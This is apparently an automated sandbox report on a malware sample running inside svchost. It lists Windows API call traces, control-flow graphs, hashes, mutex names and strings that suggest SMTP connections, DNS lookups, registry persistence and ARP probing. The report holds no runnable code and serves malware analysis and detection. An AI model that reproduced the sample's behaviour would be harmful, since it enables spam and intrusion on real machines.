                                                                                                                                                                                                                                                            • Part of subcall function 13152AB7: GetProcAddress.KERNEL32(?,EncodePointer), ref: 13152AFC
                                                                                                                                                                                                                                                            • Part of subcall function 13152AB7: GetProcAddress.KERNEL32(?,DecodePointer), ref: 13152B0C
                                                                                                                                                                                                                                                            • Part of subcall function 13152AB7: InterlockedIncrement.KERNEL32(1315AD08), ref: 13152B2E
                                                                                                                                                                                                                                                            • Part of subcall function 13152AB7: __lock.LIBCMT ref: 13152B36
                                                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 13152BCA
                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,?,?,13152A61,?,13152F12,?,00000001,?,131523E7,00000018,13156968,0000000C,13152476,?), ref: 13152BE2
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2788914206.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Value$AddressErrorLastProc$CurrentHandleIncrementInterlockedModuleSleepThread__calloc_crt__calloc_impl__lock
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2539975944-0
                                                                                                                                                                                                                                                          • Opcode ID: adb725a9134938a95b1c836ee6b1e9ea189e50f410bd80173755e6f9bbf1f5cb
                                                                                                                                                                                                                                                          • Instruction ID: 3867756d27c0135bee374bf51de64289947cab669b26ec1be1cedbf1d942a3e8
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: adb725a9134938a95b1c836ee6b1e9ea189e50f410bd80173755e6f9bbf1f5cb
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2AF0C8376057726BD73A3B785C45BCA3B549F066B1B254529F830D71C0DF74D84286A0
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • __lock.LIBCMT ref: 131524AC
                                                                                                                                                                                                                                                            • Part of subcall function 1315245D: __mtinitlocknum.LIBCMT ref: 13152471
                                                                                                                                                                                                                                                            • Part of subcall function 1315245D: __amsg_exit.LIBCMT ref: 1315247D
                                                                                                                                                                                                                                                            • Part of subcall function 1315245D: EnterCriticalSection.KERNEL32(?,?,?,131520C2,0000000E,13156928,0000000C,13151F97), ref: 13152485
                                                                                                                                                                                                                                                          • ___sbh_find_block.LIBCMT ref: 131524B7
                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,13156988,0000000C,13152BDE,00000000,?,?,?,13152A61,?,13152F12,?,00000001,?,131523E7), ref: 131524F6
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,13152A61,?,13152F12,?,00000001,?,131523E7,00000018,13156968,0000000C,13152476,?), ref: 13152507
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2788914206.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block__amsg_exit__lock__mtinitlocknum
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 568605419-0
                                                                                                                                                                                                                                                          • Opcode ID: e9114d0c0ff4a43fac76cc6f14c2f50f79e9beee09b5af3449e75a3f86d0cf08
                                                                                                                                                                                                                                                          • Instruction ID: 97e5660a8f24ec920a53af5c230e12b3f3b18b346be0e6faeaed023650b73dfe
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e9114d0c0ff4a43fac76cc6f14c2f50f79e9beee09b5af3449e75a3f86d0cf08
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A701D637A04352EFDB245FB99D14BDD37A8EF03325F248029F074A7180CB34A142CA65
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetTimeZoneInformation.KERNEL32(?), ref: 131472EB
                                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 131472FE
                                                                                                                                                                                                                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 1314732B
                                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 1314734E
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2788914206.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Time$CountFileInformationSystemTickZonewsprintf
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3771035241-0
                                                                                                                                                                                                                                                          • Opcode ID: 9b8cba2e2565f2633aaa26bbdea80ebef9a999678d94bc7ba9552831924f8386
                                                                                                                                                                                                                                                          • Instruction ID: 81c63a60cc059b6bfd8228d21a569bd5be14de8077915da8032e81f50a11be82
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9b8cba2e2565f2633aaa26bbdea80ebef9a999678d94bc7ba9552831924f8386
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AF014FB2900219ABEB08EFF4CC85ED93B6DEB04258F114022F916E2154DB74D9848B60
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000,00000000,?,?,00000000), ref: 131478D7
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,00000079,00000078,00000077,00000076,00000072,00000073,00000075,00000074,00000000,?,?,00000000), ref: 13147991
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2788914206.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: lstrlen
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1659193697-0
                                                                                                                                                                                                                                                          • Opcode ID: e7f9391607f021f4d8924145494e6a8032ec71588c8ab831527aa72afbe9283c
                                                                                                                                                                                                                                                          • Instruction ID: 8dd164e209e03d13d7b080f773f999a28fe30cacf76840b08c0393114a442a66
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e7f9391607f021f4d8924145494e6a8032ec71588c8ab831527aa72afbe9283c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F8812576A043899FDB21CF78CC90BEE3BA5AF91304F3C4069E86587242E775E546CB61
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • StrStrA.SHLWAPI(?,131414A8,?,-00000004,-00000008,?,?,13145A1C,-00000004,?,?,?,?,00000000,76132640), ref: 13150AC3
                                                                                                                                                                                                                                                          • StrStrA.SHLWAPI(?,131414A4,?,-00000004,-00000008,?,?,13145A1C,-00000004,?,?,?,?,00000000,76132640), ref: 13150ADC
                                                                                                                                                                                                                                                          • CharUpperBuffA.USER32(?,00000001,?,-00000004,-00000008,?,?,13145A1C,-00000004,?,?,?,?,00000000,76132640), ref: 13150AEC
                                                                                                                                                                                                                                                          • CharUpperBuffA.USER32(00000001,00000001,?,-00000004,-00000008,?,?,13145A1C,-00000004,?,?,?,?,00000000,76132640), ref: 13150AF6
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2788914206.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: BuffCharUpper
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3964851224-0
                                                                                                                                                                                                                                                          • Opcode ID: 57765c3c445889a43e435764364cbc31ae2d5125bd47808fc7dd29a1bfb32e86
                                                                                                                                                                                                                                                          • Instruction ID: 8a890dfedadfda042d93f051d7c424d01016adc2c87a64bcc8cd4253731e0296
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 57765c3c445889a43e435764364cbc31ae2d5125bd47808fc7dd29a1bfb32e86
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9F513BB5A00249EFD711DFACC980DAEBBF8FF59304B254469F895E7201D731AA50CBA0
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(06201028,13161EF0,00000000,06201020,06201020,?,1314CD55,?,13161EF0,131616E8), ref: 131518DE
                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(06201028,?,1314CD55,?), ref: 131518EB
                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(06201028,131616E8,?,1314CD55,?), ref: 131518FE
                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(00000000,131616E8,?,1314CD55,?), ref: 13151917
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2788914206.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CriticalSection$Leave$Enter
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2978645861-0
                                                                                                                                                                                                                                                          • Opcode ID: caab4dd3995b537a3e7fe88bb2e5526481f7b060322a23dbf6b07f2b764f47e7
                                                                                                                                                                                                                                                          • Instruction ID: b084411877ebf042b22e5047ccc07a2e31583f90b1ca21c5034c9ad215dd48ba
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: caab4dd3995b537a3e7fe88bb2e5526481f7b060322a23dbf6b07f2b764f47e7
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 00216A79600245EFC709CF56C58495AB7BAFF8A325B258479E5679B311C730F881CBA0
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,00000000,1314B98F,?,00000000,-00000004,0000003B,?,00000000,00000000,00000000,?,1468EC68,00000000), ref: 1315152A
                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,1468EC68,00000000,?,?,?,?,?,?,?), ref: 13151538
                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,131616E8,?,1468EC68,00000000,?,?,?,?,?,?,?), ref: 1315154D
                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,000003E8,0000000C), ref: 13151587
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2788914206.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CriticalSection$Leave$Enter
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2978645861-0
                                                                                                                                                                                                                                                          • Opcode ID: 52f5398c6f4f577c8c4e76fa03d76cbf28ba0f649fac66cf99410e3d807f1ade
                                                                                                                                                                                                                                                          • Instruction ID: 3189dacb6dec9ddd2fbf7ef972df95b778389ddc3128e999783537223a99cae5
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 52f5398c6f4f577c8c4e76fa03d76cbf28ba0f649fac66cf99410e3d807f1ade
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 59012D356143619FCB229F6ACDC8816B7E9AF4B6607094939F597D3211C730E844CB61
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 0 1314e022-1314e084 GetSystemTime call 1314ffe0 GetTickCount * 2 3 1314e086 0->3 4 1314e08d-1314e090 0->4 3->4 5 1314e092-1314e0ca call 13144eb1 * 2 call 13145b8d call 13144ec3 * 2 4->5 6 1314e0cd-1314e0d3 4->6 5->6 7 1314e19c-1314e1ad call 1314daf3 6->7 8 1314e0d9-1314e0e0 6->8 18 1314e2a7-1314e2e1 shutdown closesocket call 13142f89 call 131506de 7->18 19 1314e1b3-1314e1c7 OpenMutexA 7->19 11 1314e0f5-1314e107 socket 8->11 12 1314e0e2-1314e0f0 shutdown closesocket 8->12 15 1314e10d-1314e142 call 13142f89 call 131506de 11->15 16 1314e32e-1314e35b ExitProcess GetTickCount 11->16 12->11 42 1314e144 15->42 43 1314e14b-1314e16a htons connect 15->43 23 1314e362-1314e390 call 13144d1b htons 16->23 18->4 45 1314e2e7-1314e329 call 13144c2f call 13144eb1 * 2 call 1314df63 call 13144ec3 * 2 18->45 24 1314e1d7-1314e1f8 call 13144c2f GetTickCount call 1314dfa8 19->24 25 1314e1c9-1314e1d1 CreateMutexA 19->25 40 1314e393-1314e399 23->40 24->4 56 1314e1fe-1314e21a call 13142f89 call 131506de 24->56 25->24 46 1314e3f9 40->46 47 1314e39b-1314e3c5 call 13142f89 DnsQuery_A 40->47 42->43 49 1314e16c-1314e177 call 1314d187 43->49 50 1314e179-1314e184 GetLastError Sleep 43->50 45->4 57 1314e3fb-1314e401 46->57 68 1314e3c7-1314e3eb call 13144d1b DnsRecordListFree 47->68 69 1314e3f0-1314e3f7 47->69 52 1314e18a-1314e196 49->52 50->52 52->4 52->7 86 1314e21c-1314e228 closesocket 56->86 87 1314e22d-1314e259 call 13142f89 call 131506de GetTickCount 56->87 62 1314e472-1314e47f 57->62 63 1314e403-1314e409 57->63 66 1314e481-1314e488 62->66 67 1314e49a-1314e4ba call 13142f89 call 131506de 62->67 71 1314e467-1314e470 63->71 72 1314e40b-1314e44f socket setsockopt connect 63->72 76 1314e489-1314e48b 66->76 67->23 95 1314e4c0-1314e4c6 67->95 68->69 69->40 69->46 71->57 71->62 73 1314e461-1314e462 closesocket 72->73 74 1314e451-1314e45c recv 72->74 73->71 74->73 81 1314e494-1314e498 76->81 82 1314e48d 76->82 81->67 81->76 82->81 86->87 87->4 102 1314e25f-1314e29a Sleep call 13142f89 call 131506de GetTickCount 87->102 95->23 98 1314e4cc-1314e4da Sleep 95->98 98->95 101 1314e4dc 98->101 101->23 109 1314e29c-1314e2a2 102->109 109->4
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetSystemTime.KERNEL32(?,00020000,76122E60,00000000), ref: 1314E02F
                                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 1314E04A
                                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 1314E051
                                                                                                                                                                                                                                                          • shutdown.WS2_32(?,00000002), ref: 1314E0E5
                                                                                                                                                                                                                                                          • closesocket.WS2_32(?), ref: 1314E0F0
                                                                                                                                                                                                                                                          • socket.WS2_32(00000002,00000001,00000000), ref: 1314E0FA
                                                                                                                                                                                                                                                          • htons.WS2_32(00000019), ref: 1314E14E
                                                                                                                                                                                                                                                          • connect.WS2_32(00000002,00000010,00000019), ref: 1314E163
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000002,00000010,00000019,-00000004,00000041,00000000,00000002,00000001,00000000), ref: 1314E179
                                                                                                                                                                                                                                                          • Sleep.KERNEL32(000003E8), ref: 1314E184
                                                                                                                                                                                                                                                          • OpenMutexA.KERNEL32(001F0001,00000000), ref: 1314E1BF
                                                                                                                                                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000000), ref: 1314E1D1
                                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 1314E1E8
                                                                                                                                                                                                                                                          • closesocket.WS2_32(-00000004), ref: 1314E228
                                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 1314E24F
                                                                                                                                                                                                                                                          • Sleep.KERNEL32(000001F4), ref: 1314E264
                                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 1314E28C
                                                                                                                                                                                                                                                          • shutdown.WS2_32(00000002,00000000), ref: 1314E2B5
                                                                                                                                                                                                                                                          • closesocket.WS2_32 ref: 1314E2C0
                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32(00000000,00000002,00000001,00000000), ref: 1314E32E
                                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 1314E347
                                                                                                                                                                                                                                                          • htons.WS2_32(00000019), ref: 1314E387
                                                                                                                                                                                                                                                          • DnsQuery_A.DNSAPI(-00000004,00000001,00000000,00000000,?,00000000), ref: 1314E3BE
                                                                                                                                                                                                                                                          • DnsRecordListFree.DNSAPI(?,?), ref: 1314E3EB
                                                                                                                                                                                                                                                          • socket.WS2_32(00000002,00000001,00000006), ref: 1314E411
                                                                                                                                                                                                                                                          • setsockopt.WS2_32(00000000,0000FFFF,00001006,?,00000008), ref: 1314E433
                                                                                                                                                                                                                                                          • connect.WS2_32(00000000,00000002,00000010), ref: 1314E448
                                                                                                                                                                                                                                                          • recv.WS2_32(00000000,1468EA2E,00000064,00000000), ref: 1314E45C
                                                                                                                                                                                                                                                          • closesocket.WS2_32(00000000), ref: 1314E462
                                                                                                                                                                                                                                                          • Sleep.KERNELBASE(000003E8,-00000004,00000048,00000000,00000019,?,?,00000000), ref: 1314E4D1
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2848045515.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CountTick$closesocket$Sleep$Mutexconnecthtonsshutdownsocket$CreateErrorExitFreeLastListOpenProcessQuery_RecordSystemTimerecvsetsockopt
                                                                                                                                                                                                                                                          • String ID: 0u
                                                                                                                                                                                                                                                          • API String ID: 850683436-3203441087
                                                                                                                                                                                                                                                          • Opcode ID: c8b64258001e370bbd683c5772ae33d7400adee99e8d36d9e8e4e8549de03ca8
                                                                                                                                                                                                                                                          • Instruction ID: 43d5bb9465e87192af08d7f6881986c4e70353d981fa44b77742f62da2d52e8e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c8b64258001e370bbd683c5772ae33d7400adee99e8d36d9e8e4e8549de03ca8
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 17C1BFB5904369BBDB12AFB8CCC5AAEB77DFB05708F240539E509B3150EB786940CB61
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • IsBadReadPtr.KERNEL32(00000002,00000001,00000000,00000000), ref: 13143EFA
                                                                                                                                                                                                                                                          • htons.WS2_32(00000035), ref: 13143F44
                                                                                                                                                                                                                                                          • htons.WS2_32(00000035), ref: 13143F58
                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000035,00000035,?,?,?,?,?,?,?,?,?,?,?,0000007C), ref: 13143F85
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2848045515.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: htons$ReadSleep
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 317343359-0
                                                                                                                                                                                                                                                          • Opcode ID: 0551faee1106222f397e1c8bf519b9188c21c7dca297eb718ad6f420bc45b75c
                                                                                                                                                                                                                                                          • Instruction ID: ed5b5b64522fe66a5ea052113b0c2f9187125999cf5ff2d51e395da3c559b608
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0551faee1106222f397e1c8bf519b9188c21c7dca297eb718ad6f420bc45b75c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 40A1C075D40289EFCB01CFA8CD84DDEBBB9AF15304F2940A9E944B7251DB31AE44CB61
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 169 1314e335-1314e35b GetTickCount 170 1314e362-1314e390 call 13144d1b htons 169->170 173 1314e393-1314e399 170->173 174 1314e3f9 173->174 175 1314e39b-1314e3c5 call 13142f89 DnsQuery_A 173->175 177 1314e3fb-1314e401 174->177 183 1314e3c7-1314e3eb call 13144d1b DnsRecordListFree 175->183 184 1314e3f0-1314e3f7 175->184 179 1314e472-1314e47f 177->179 180 1314e403-1314e409 177->180 181 1314e481-1314e488 179->181 182 1314e49a-1314e4ba call 13142f89 call 131506de 179->182 185 1314e467-1314e470 180->185 186 1314e40b-1314e44f socket setsockopt connect 180->186 189 1314e489-1314e48b 181->189 182->170 198 1314e4c0-1314e4c6 182->198 183->184 184->173 184->174 185->177 185->179 187 1314e461-1314e462 closesocket 186->187 188 1314e451-1314e45c recv 186->188 187->185 188->187 192 1314e494-1314e498 189->192 193 1314e48d 189->193 192->182 192->189 193->192 198->170 199 1314e4cc-1314e4da Sleep 198->199 199->198 200 1314e4dc 199->200 200->170
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 1314E347
                                                                                                                                                                                                                                                          • htons.WS2_32(00000019), ref: 1314E387
                                                                                                                                                                                                                                                          • DnsQuery_A.DNSAPI(-00000004,00000001,00000000,00000000,?,00000000), ref: 1314E3BE
                                                                                                                                                                                                                                                          • DnsRecordListFree.DNSAPI(?,?), ref: 1314E3EB
                                                                                                                                                                                                                                                          • socket.WS2_32(00000002,00000001,00000006), ref: 1314E411
                                                                                                                                                                                                                                                          • setsockopt.WS2_32(00000000,0000FFFF,00001006,?,00000008), ref: 1314E433
                                                                                                                                                                                                                                                          • connect.WS2_32(00000000,00000002,00000010), ref: 1314E448
                                                                                                                                                                                                                                                          • recv.WS2_32(00000000,1468EA2E,00000064,00000000), ref: 1314E45C
                                                                                                                                                                                                                                                          • closesocket.WS2_32(00000000), ref: 1314E462
                                                                                                                                                                                                                                                          • Sleep.KERNELBASE(000003E8,-00000004,00000048,00000000,00000019,?,?,00000000), ref: 1314E4D1
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2848045515.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CountFreeListQuery_RecordSleepTickclosesocketconnecthtonsrecvsetsockoptsocket
                                                                                                                                                                                                                                                          • String ID: 0u
                                                                                                                                                                                                                                                          • API String ID: 3184855960-3203441087
                                                                                                                                                                                                                                                          • Opcode ID: c4891b3a70c0979d9b2374d91d66c2f0aa2713803c4fdafd80586a737ac18e5e
                                                                                                                                                                                                                                                          • Instruction ID: 3abf82c69722f3967bdfbc74bbd690c7064bfefbac1ba47bfefbd6294108a016
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c4891b3a70c0979d9b2374d91d66c2f0aa2713803c4fdafd80586a737ac18e5e
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B341F072944359BBEB129BA8CC81AEEB77CFF15B08F180439E649B7180E77469448B61
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 13145427: CreateFileA.KERNELBASE(00000000,80000000,00000000,00000000,00000003,00000006,00000000,1314334E,00016B00,LoadLibraryExA,?), ref: 1314543F
                                                                                                                                                                                                                                                          • WSAStartup.WS2_32(00000202,?), ref: 1314335A
                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 13143365
                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 131433C2
                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000064), ref: 131433CA
                                                                                                                                                                                                                                                          • OpenMutexA.KERNEL32(00020000,00000000,pvoaiwz6588), ref: 131433D8
                                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 131433ED
                                                                                                                                                                                                                                                            • Part of subcall function 1314AD4E: RegOpenKeyExA.KERNELBASE(80000002,-00000004,000000EA,00000000,000F003F,131433FC), ref: 1314AD7C
                                                                                                                                                                                                                                                            • Part of subcall function 1314AD4E: RegSetValueExA.ADVAPI32(131433FC,-00000004,0000002F,00000000,00000004,0000FFFE,00000004), ref: 1314ADA1
                                                                                                                                                                                                                                                            • Part of subcall function 1314AD4E: RegCloseKey.ADVAPI32(131433FC), ref: 1314ADAA
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2848045515.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CloseOpen$CountCreateExitFileHandleMutexProcessSleepStartupTickValue
                                                                                                                                                                                                                                                          • String ID: LoadLibraryExA$OzB$abznfys96047$iloopeb74987$pvoaiwz6588
                                                                                                                                                                                                                                                          • API String ID: 1822930774-2764520946
                                                                                                                                                                                                                                                          • Opcode ID: 965f3d8219d039e1fc520c4488c4ba020a51fddd4f67c41b5b7b0c04f2972646
                                                                                                                                                                                                                                                          • Instruction ID: 8a80587115f15fefb65b334c3320f1afafce057311b930bd89483dacacd9f4c7
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 965f3d8219d039e1fc520c4488c4ba020a51fddd4f67c41b5b7b0c04f2972646
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A71198B6600355AFE710BBBD8DC5B5E765CEB05658F390835EA08D2544FF38A8118A71
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • gethostname.WS2_32(?,00000040), ref: 13146239
                                                                                                                                                                                                                                                          • gethostbyname.WS2_32(?), ref: 13146242
                                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(iphlpapi.dll,?,?,LoadLibraryExA), ref: 1314626B
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SendARP), ref: 1314627D
                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,LoadLibraryExA), ref: 13146288
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2848045515.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Library$AddressFreeLoadProcgethostbynamegethostname
                                                                                                                                                                                                                                                          • String ID: LoadLibraryExA$SendARP$iphlpapi.dll
                                                                                                                                                                                                                                                          • API String ID: 4149995341-444255208
